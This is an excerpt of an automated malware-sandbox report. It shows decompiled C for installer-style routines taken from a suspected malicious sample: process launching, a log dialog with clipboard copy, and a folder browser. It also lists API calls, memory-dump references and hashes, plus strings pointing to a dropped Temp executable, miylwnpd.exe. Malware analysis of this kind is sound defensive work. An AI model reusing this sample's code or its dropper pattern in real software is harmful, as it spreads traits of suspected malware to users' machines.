            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 78%
            			E00401FA4() {
            				void* _t9;
            				intOrPtr _t13;
            				void* _t15;
            				void* _t17;
            				void* _t20;
            				void* _t22;
            
            				_t19 = E00402DA6(_t15);
            				E004056D0(0xffffffeb, _t7);
            				_t9 = E00405C51(_t19); // executed
            				_t20 = _t9;
            				if(_t20 == _t15) {
            					 *((intOrPtr*)(_t22 - 4)) = 1;
            				} else {
            					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
            						_t13 = E00406AE6(_t17, _t20); // executed
            						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
            							if(_t13 != _t15) {
            								 *((intOrPtr*)(_t22 - 4)) = 1;
            							}
            						} else {
            							E004065B5( *((intOrPtr*)(_t22 - 0xc)), _t13);
            						}
            					}
            					_push(_t20);
            					CloseHandle();
            				}
            				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t22 - 4));
            				return 0;
            			}









            0x00401faa
            0x00401faf
            0x00401fb5
            0x00401fba
            0x00401fbe
            0x0040292e
            0x00401fc4
            0x00401fc7
            0x00401fca
            0x00401fd2
            0x00401fe1
            0x00401fe3
            0x00401fe3
            0x00401fd4
            0x00401fd8
            0x00401fd8
            0x00401fd2
            0x00401fea
            0x00401feb
            0x00401feb
            0x00402c2d
            0x00402c39

            APIs
              • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
              • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
              • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
              • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
              • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
              • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
              • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
              • Part of subcall function 00405C51: CreateProcessW.KERNELBASE ref: 00405C7A
              • Part of subcall function 00405C51: CloseHandle.KERNEL32(?), ref: 00405C87
            • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401FEB
              • Part of subcall function 00406AE6: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
              • Part of subcall function 00406AE6: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
              • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
            • String ID:
            • API String ID: 2972824698-0
            • Opcode ID: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
            • Instruction ID: 2caf0deb9ca9c7db124b05ee4a2ba4d84aa6555efd1b03c2e112275a9e200b7a
            • Opcode Fuzzy Hash: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
            • Instruction Fuzzy Hash: FCF09671904111E7DB11BBA59A88E9E76A4DF01318F25443BE102B21D0D77C4D419A6E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			E0040580F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
            				struct HWND__* _v8;
            				long _v12;
            				struct tagRECT _v28;
            				void* _v36;
            				signed int _v40;
            				int _v44;
            				int _v48;
            				signed int _v52;
            				int _v56;
            				void* _v60;
            				void* _v68;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				struct HWND__* _t94;
            				long _t95;
            				int _t100;
            				void* _t108;
            				intOrPtr _t130;
            				struct HWND__* _t134;
            				int _t156;
            				int _t159;
            				struct HMENU__* _t164;
            				struct HWND__* _t168;
            				struct HWND__* _t169;
            				int _t171;
            				void* _t172;
            				short* _t173;
            				short* _t175;
            				int _t177;
            
            				_t169 =  *0x7a7a84;
            				_t156 = 0;
            				_v8 = _t169;
            				if(_a8 != 0x110) {
            					if(_a8 == 0x405) {
            						CloseHandle(CreateThread(0, 0, E004057A3, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
            					}
            					if(_a8 != 0x111) {
            						L17:
            						_t171 = 1;
            						if(_a8 != 0x404) {
            							L25:
            							if(_a8 != 0x7b) {
            								goto L20;
            							}
            							_t94 = _v8;
            							if(_a12 != _t94) {
            								goto L20;
            							}
            							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
            							_a8 = _t95;
            							if(_t95 <= _t156) {
            								L36:
            								return 0;
            							}
            							_t164 = CreatePopupMenu();
            							AppendMenuW(_t164, _t156, _t171, E004066AB(_t156, _t164, _t171, _t156, 0xffffffe1));
            							_t100 = _a16;
            							_t159 = _a16 >> 0x10;
            							if(_a16 == 0xffffffff) {
            								GetWindowRect(_v8,  &_v28);
            								_t100 = _v28.left;
            								_t159 = _v28.top;
            							}
            							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
            								_v60 = _t156;
            								_v48 = 0x7a1f88;
            								_v44 = 0x1000;
            								_a4 = _a8;
            								do {
            									_a4 = _a4 - 1;
            									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
            								} while (_a4 != _t156);
            								OpenClipboard(_t156);
            								EmptyClipboard();
            								_t108 = GlobalAlloc(0x42, _t171 + _t171);
            								_a4 = _t108;
            								_t172 = GlobalLock(_t108);
            								do {
            									_v48 = _t172;
            									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
            									 *_t173 = 0xd;
            									_t175 = _t173 + 2;
            									 *_t175 = 0xa;
            									_t172 = _t175 + 2;
            									_t156 = _t156 + 1;
            								} while (_t156 < _a8);
            								GlobalUnlock(_a4);
            								SetClipboardData(0xd, _a4);
            								CloseClipboard();
            							}
            							goto L36;
            						}
            						if( *0x7a7a6c == _t156) {
            							ShowWindow( *0x7a8aa8, 8);
            							if( *0x7a8b2c == _t156) {
            								E004056D0( *((intOrPtr*)( *0x7a0f60 + 0x34)), _t156);
            							}
            							E004045A3(_t171);
            							goto L25;
            						}
            						 *0x7a0758 = 2;
            						E004045A3(0x78);
            						goto L20;
            					} else {
            						if(_a12 != 0x403) {
            							L20:
            							return E00404631(_a8, _a12, _a16);
            						}
            						ShowWindow( *0x7a7a70, _t156);
            						ShowWindow(_t169, 8);
            						E004045FF(_t169);
            						goto L17;
            					}
            				}
            				_v52 = _v52 | 0xffffffff;
            				_v40 = _v40 | 0xffffffff;
            				_t177 = 2;
            				_v60 = _t177;
            				_v56 = 0;
            				_v48 = 0;
            				_v44 = 0;
            				asm("stosd");
            				asm("stosd");
            				_t130 =  *0x7a8ab0;
            				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
            				_a12 =  *((intOrPtr*)(_t130 + 0x60));
            				 *0x7a7a70 = GetDlgItem(_a4, 0x403);
            				 *0x7a7a68 = GetDlgItem(_a4, 0x3ee);
            				_t134 = GetDlgItem(_a4, 0x3f8);
            				 *0x7a7a84 = _t134;
            				_v8 = _t134;
            				E004045FF( *0x7a7a70);
            				 *0x7a7a74 = E00404F58(4);
            				 *0x7a7a8c = 0;
            				GetClientRect(_v8,  &_v28);
            				_v52 = _v28.right - GetSystemMetrics(_t177);
            				SendMessageW(_v8, 0x1061, 0,  &_v60);
            				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
            				if(_a8 >= 0) {
            					SendMessageW(_v8, 0x1001, 0, _a8);
            					SendMessageW(_v8, 0x1026, 0, _a8);
            				}
            				if(_a12 >= _t156) {
            					SendMessageW(_v8, 0x1024, _t156, _a12);
            				}
            				_push( *((intOrPtr*)(_a16 + 0x30)));
            				_push(0x1b);
            				E004045CA(_a4);
            				if(( *0x7a8ab8 & 0x00000003) != 0) {
            					ShowWindow( *0x7a7a70, _t156);
            					if(( *0x7a8ab8 & 0x00000002) != 0) {
            						 *0x7a7a70 = _t156;
            					} else {
            						ShowWindow(_v8, 8);
            					}
            					E004045FF( *0x7a7a68);
            				}
            				_t168 = GetDlgItem(_a4, 0x3ec);
            				SendMessageW(_t168, 0x401, _t156, 0x75300000);
            				if(( *0x7a8ab8 & 0x00000004) != 0) {
            					SendMessageW(_t168, 0x409, _t156, _a12);
            					SendMessageW(_t168, 0x2001, _t156, _a8);
            				}
            				goto L36;
            			}

































            0x00405817
            0x0040581d
            0x00405827
            0x0040582a
            0x004059c0
            0x004059e4
            0x004059e4
            0x004059f7
            0x00405a15
            0x00405a17
            0x00405a1f
            0x00405a75
            0x00405a79
            0x00000000
            0x00000000
            0x00405a7b
            0x00405a81
            0x00000000
            0x00000000
            0x00405a8b
            0x00405a93
            0x00405a96
            0x00405b98
            0x00000000
            0x00405b98
            0x00405aa5
            0x00405ab0
            0x00405ab9
            0x00405ac4
            0x00405ac7
            0x00405ad0
            0x00405ad6
            0x00405ad9
            0x00405ad9
            0x00405af1
            0x00405afa
            0x00405afd
            0x00405b04
            0x00405b0b
            0x00405b13
            0x00405b13
            0x00405b2a
            0x00405b2a
            0x00405b31
            0x00405b37
            0x00405b43
            0x00405b4a
            0x00405b53
            0x00405b55
            0x00405b58
            0x00405b67
            0x00405b6a
            0x00405b70
            0x00405b71
            0x00405b77
            0x00405b78
            0x00405b79
            0x00405b81
            0x00405b8c
            0x00405b92
            0x00405b92
            0x00000000
            0x00405af1
            0x00405a27
            0x00405a57
            0x00405a5f
            0x00405a6a
            0x00405a6a
            0x00405a70
            0x00000000
            0x00405a70
            0x00405a2b
            0x00405a35
            0x00000000
            0x004059f9
            0x004059ff
            0x00405a3a
            0x00000000
            0x00405a43
            0x00405a08
            0x00405a0d
            0x00405a10
            0x00000000
            0x00405a10
            0x004059f7
            0x00405830
            0x00405834
            0x0040583c
            0x00405840
            0x00405843
            0x00405846
            0x00405849
            0x0040584c
            0x0040584d
            0x0040584e
            0x00405867
            0x0040586a
            0x00405874
            0x00405883
            0x0040588b
            0x00405893
            0x00405898
            0x0040589b
            0x004058a7
            0x004058b0
            0x004058b9
            0x004058db
            0x004058e1
            0x004058f2
            0x004058f7
            0x00405905
            0x00405913
            0x00405913
            0x00405918
            0x00405926
            0x00405926
            0x0040592b
            0x0040592e
            0x00405933
            0x0040593f
            0x00405948
            0x00405955
            0x00405964
            0x00405957
            0x0040595c
            0x0040595c
            0x00405970
            0x00405970
            0x00405984
            0x0040598d
            0x00405996
            0x004059a6
            0x004059b2
            0x004059b2
            0x00000000

            APIs
            • GetDlgItem.USER32 ref: 0040586D
            • GetDlgItem.USER32 ref: 0040587C
            • GetClientRect.USER32 ref: 004058B9
            • GetSystemMetrics.USER32 ref: 004058C0
            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058E1
            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058F2
            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405905
            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405913
            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405926
            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405948
            • ShowWindow.USER32(?,00000008), ref: 0040595C
            • GetDlgItem.USER32 ref: 0040597D
            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040598D
            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A6
            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059B2
            • GetDlgItem.USER32 ref: 0040588B
              • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
            • GetDlgItem.USER32 ref: 004059CF
            • CreateThread.KERNEL32 ref: 004059DD
            • CloseHandle.KERNEL32(00000000), ref: 004059E4
            • ShowWindow.USER32(00000000), ref: 00405A08
            • ShowWindow.USER32(?,00000008), ref: 00405A0D
            • ShowWindow.USER32(00000008), ref: 00405A57
            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A8B
            • CreatePopupMenu.USER32 ref: 00405A9C
            • AppendMenuW.USER32 ref: 00405AB0
            • GetWindowRect.USER32 ref: 00405AD0
            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE9
            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B21
            • OpenClipboard.USER32(00000000), ref: 00405B31
            • EmptyClipboard.USER32 ref: 00405B37
            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B43
            • GlobalLock.KERNEL32 ref: 00405B4D
            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B61
            • GlobalUnlock.KERNEL32(00000000), ref: 00405B81
            • SetClipboardData.USER32 ref: 00405B8C
            • CloseClipboard.USER32 ref: 00405B92
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
            • String ID: {
            • API String ID: 590372296-366298937
            • Opcode ID: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
            • Instruction ID: f3bb878df23a29f955279a02cf148875578f9ab87112c8cbe183df0a3e5e7c84
            • Opcode Fuzzy Hash: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
            • Instruction Fuzzy Hash: 7DB16BB1900608FFDF119F64DD89AAE7B79FB45354F00802AFA41BA1A0CB785E51DF68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 78%
            			E00404ABB(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
            				signed int _v8;
            				signed int _v12;
            				long _v16;
            				long _v20;
            				long _v24;
            				char _v28;
            				intOrPtr _v32;
            				long _v36;
            				char _v40;
            				unsigned int _v44;
            				signed int _v48;
            				WCHAR* _v56;
            				intOrPtr _v60;
            				intOrPtr _v64;
            				intOrPtr _v68;
            				WCHAR* _v72;
            				void _v76;
            				struct HWND__* _v80;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t82;
            				long _t87;
            				short* _t89;
            				void* _t95;
            				signed int _t96;
            				int _t109;
            				signed short _t114;
            				signed int _t118;
            				struct HWND__** _t122;
            				intOrPtr* _t138;
            				WCHAR* _t146;
            				unsigned int _t150;
            				signed int _t152;
            				unsigned int _t156;
            				signed int _t158;
            				signed int* _t159;
            				signed int* _t160;
            				struct HWND__* _t166;
            				struct HWND__* _t167;
            				int _t169;
            				unsigned int _t197;
            
            				_t156 = __edx;
            				_t82 =  *0x7a0f60;
            				_v32 = _t82;
            				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
            				_v12 =  *((intOrPtr*)(_t82 + 0x38));
            				if(_a8 == 0x40b) {
            					E00405CB2(0x3fb, _t146);
            					E004068F5(_t146);
            				}
            				_t167 = _a4;
            				if(_a8 != 0x110) {
            					L8:
            					if(_a8 != 0x111) {
            						L20:
            						if(_a8 == 0x40f) {
            							L22:
            							_v8 = _v8 & 0x00000000;
            							_v12 = _v12 & 0x00000000;
            							E00405CB2(0x3fb, _t146);
            							if(E00406045(_t186, _t146) == 0) {
            								_v8 = 1;
            							}
            							E0040666E(0x79ff58, _t146);
            							_t87 = E00406A3B(1);
            							_v16 = _t87;
            							if(_t87 == 0) {
            								L30:
            								E0040666E(0x79ff58, _t146);
            								_t89 = E00405FE8(0x79ff58);
            								_t158 = 0;
            								if(_t89 != 0) {
            									 *_t89 = 0;
            								}
            								if(GetDiskFreeSpaceW(0x79ff58,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
            									goto L35;
            								} else {
            									_t169 = 0x400;
            									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
            									asm("cdq");
            									_v48 = _t109;
            									_v44 = _t156;
            									_v12 = 1;
            									goto L36;
            								}
            							} else {
            								_t159 = 0;
            								if(0 == 0x79ff58) {
            									goto L30;
            								} else {
            									goto L26;
            								}
            								while(1) {
            									L26:
            									_t114 = _v16(0x79ff58,  &_v48,  &_v28,  &_v40);
            									if(_t114 != 0) {
            										break;
            									}
            									if(_t159 != 0) {
            										 *_t159 =  *_t159 & _t114;
            									}
            									_t160 = E00405F89(0x79ff58);
            									 *_t160 =  *_t160 & 0x00000000;
            									_t159 = _t160;
            									 *_t159 = 0x5c;
            									if(_t159 != 0x79ff58) {
            										continue;
            									} else {
            										goto L30;
            									}
            								}
            								_t150 = _v44;
            								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
            								_v44 = _t150 >> 0xa;
            								_v12 = 1;
            								_t158 = 0;
            								__eflags = 0;
            								L35:
            								_t169 = 0x400;
            								L36:
            								_t95 = E00404F58(5);
            								if(_v12 != _t158) {
            									_t197 = _v44;
            									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
            										_v8 = 2;
            									}
            								}
            								if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != _t158) {
            									E00404F40(0x3ff, 0xfffffffb, _t95);
            									if(_v12 == _t158) {
            										SetDlgItemTextW(_a4, _t169, 0x79ff48);
            									} else {
            										E00404E77(_t169, 0xfffffffc, _v48, _v44);
            									}
            								}
            								_t96 = _v8;
            								 *0x7a8b44 = _t96;
            								if(_t96 == _t158) {
            									_v8 = E0040140B(7);
            								}
            								if(( *(_v32 + 0x14) & _t169) != 0) {
            									_v8 = _t158;
            								}
            								E004045EC(0 | _v8 == _t158);
            								if(_v8 == _t158 &&  *0x7a1f78 == _t158) {
            									E00404A14();
            								}
            								 *0x7a1f78 = _t158;
            								goto L53;
            							}
            						}
            						_t186 = _a8 - 0x405;
            						if(_a8 != 0x405) {
            							goto L53;
            						}
            						goto L22;
            					}
            					_t118 = _a12 & 0x0000ffff;
            					if(_t118 != 0x3fb) {
            						L12:
            						if(_t118 == 0x3e9) {
            							_t152 = 7;
            							memset( &_v76, 0, _t152 << 2);
            							_v80 = _t167;
            							_v72 = 0x7a1f88;
            							_v60 = E00404E11;
            							_v56 = _t146;
            							_v68 = E004066AB(_t146, 0x7a1f88, _t167, 0x7a0760, _v12);
            							_t122 =  &_v80;
            							_v64 = 0x41;
            							__imp__SHBrowseForFolderW(_t122);
            							if(_t122 == 0) {
            								_a8 = 0x40f;
            							} else {
            								__imp__CoTaskMemFree(_t122);
            								E00405F3D(_t146);
            								_t125 =  *((intOrPtr*)( *0x7a8ab0 + 0x11c));
            								if( *((intOrPtr*)( *0x7a8ab0 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
            									E004066AB(_t146, 0x7a1f88, _t167, 0, _t125);
            									if(lstrcmpiW(0x7a6a40, 0x7a1f88) != 0) {
            										lstrcatW(_t146, 0x7a6a40);
            									}
            								}
            								 *0x7a1f78 =  *0x7a1f78 + 1;
            								SetDlgItemTextW(_t167, 0x3fb, _t146);
            							}
            						}
            						goto L20;
            					}
            					if(_a12 >> 0x10 != 0x300) {
            						goto L53;
            					}
            					_a8 = 0x40f;
            					goto L12;
            				} else {
            					_t166 = GetDlgItem(_t167, 0x3fb);
            					if(E00405FB4(_t146) != 0 && E00405FE8(_t146) == 0) {
            						E00405F3D(_t146);
            					}
            					 *0x7a7a78 = _t167;
            					SetWindowTextW(_t166, _t146);
            					_push( *((intOrPtr*)(_a16 + 0x34)));
            					_push(1);
            					E004045CA(_t167);
            					_push( *((intOrPtr*)(_a16 + 0x30)));
            					_push(0x14);
            					E004045CA(_t167);
            					E004045FF(_t166);
            					_t138 = E00406A3B(8);
            					if(_t138 == 0) {
            						L53:
            						return E00404631(_a8, _a12, _a16);
            					} else {
            						 *_t138(_t166, 1);
            						goto L8;
            					}
            				}
            			}













































            0x00404abb
            0x00404ac1
            0x00404ac7
            0x00404ad4
            0x00404ae2
            0x00404ae5
            0x00404aed
            0x00404af3
            0x00404af3
            0x00404aff
            0x00404b02
            0x00404b70
            0x00404b77
            0x00404c4e
            0x00404c55
            0x00404c64
            0x00404c64
            0x00404c68
            0x00404c72
            0x00404c7f
            0x00404c81
            0x00404c81
            0x00404c8f
            0x00404c96
            0x00404c9d
            0x00404ca0
            0x00404cdc
            0x00404cde
            0x00404ce4
            0x00404ce9
            0x00404ced
            0x00404cef
            0x00404cef
            0x00404d0b
            0x00000000
            0x00404d0d
            0x00404d10
            0x00404d1e
            0x00404d24
            0x00404d25
            0x00404d28
            0x00404d2b
            0x00000000
            0x00404d2b
            0x00404ca2
            0x00404ca4
            0x00404ca8
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00404caa
            0x00404caa
            0x00404cb7
            0x00404cbc
            0x00000000
            0x00000000
            0x00404cc0
            0x00404cc2
            0x00404cc2
            0x00404ccb
            0x00404ccd
            0x00404cd2
            0x00404cd5
            0x00404cda
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00404cda
            0x00404d37
            0x00404d41
            0x00404d44
            0x00404d47
            0x00404d4e
            0x00404d4e
            0x00404d50
            0x00404d50
            0x00404d55
            0x00404d57
            0x00404d5f
            0x00404d66
            0x00404d68
            0x00404d73
            0x00404d73
            0x00404d68
            0x00404d83
            0x00404d8d
            0x00404d95
            0x00404db0
            0x00404d97
            0x00404da0
            0x00404da0
            0x00404d95
            0x00404db5
            0x00404dba
            0x00404dbf
            0x00404dc8
            0x00404dc8
            0x00404dd1
            0x00404dd3
            0x00404dd3
            0x00404ddf
            0x00404de7
            0x00404df1
            0x00404df1
            0x00404df6
            0x00000000
            0x00404df6
            0x00404ca0
            0x00404c57
            0x00404c5e
            0x00000000
            0x00000000
            0x00000000
            0x00404c5e
            0x00404b7d
            0x00404b86
            0x00404ba0
            0x00404ba5
            0x00404baf
            0x00404bb6
            0x00404bc2
            0x00404bc5
            0x00404bc8
            0x00404bcf
            0x00404bd7
            0x00404bda
            0x00404bde
            0x00404be5
            0x00404bed
            0x00404c47
            0x00404bef
            0x00404bf0
            0x00404bf7
            0x00404c01
            0x00404c09
            0x00404c16
            0x00404c2a
            0x00404c2e
            0x00404c2e
            0x00404c2a
            0x00404c33
            0x00404c40
            0x00404c40
            0x00404bed
            0x00000000
            0x00404ba5
            0x00404b93
            0x00000000
            0x00000000
            0x00404b99
            0x00000000
            0x00404b04
            0x00404b11
            0x00404b1a
            0x00404b27
            0x00404b27
            0x00404b2e
            0x00404b34
            0x00404b3d
            0x00404b40
            0x00404b43
            0x00404b4b
            0x00404b4e
            0x00404b51
            0x00404b57
            0x00404b5e
            0x00404b65
            0x00404dfc
            0x00404e0e
            0x00404b6b
            0x00404b6e
            0x00000000
            0x00404b6e
            0x00404b65

            APIs
            • GetDlgItem.USER32 ref: 00404B0A
            • SetWindowTextW.USER32(00000000,?), ref: 00404B34
            • SHBrowseForFolderW.SHELL32(?), ref: 00404BE5
            • CoTaskMemFree.OLE32(00000000), ref: 00404BF0
            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,007A1F88,00000000,?,?), ref: 00404C22
            • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl), ref: 00404C2E
            • SetDlgItemTextW.USER32 ref: 00404C40
              • Part of subcall function 00405CB2: GetDlgItemTextW.USER32(?,?,00000400,00404C77), ref: 00405CC5
              • Part of subcall function 004068F5: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406958
              • Part of subcall function 004068F5: CharNextW.USER32(?,?,?,00000000,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406967
              • Part of subcall function 004068F5: CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040696C
              • Part of subcall function 004068F5: CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040697F
            • GetDiskFreeSpaceW.KERNEL32(0079FF58,?,?,0000040F,?,0079FF58,0079FF58,?,00000001,0079FF58,?,?,000003FB,?), ref: 00404D03
            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D1E
              • Part of subcall function 00404E77: lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
              • Part of subcall function 00404E77: wsprintfW.USER32 ref: 00404F21
              • Part of subcall function 00404E77: SetDlgItemTextW.USER32 ref: 00404F34
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
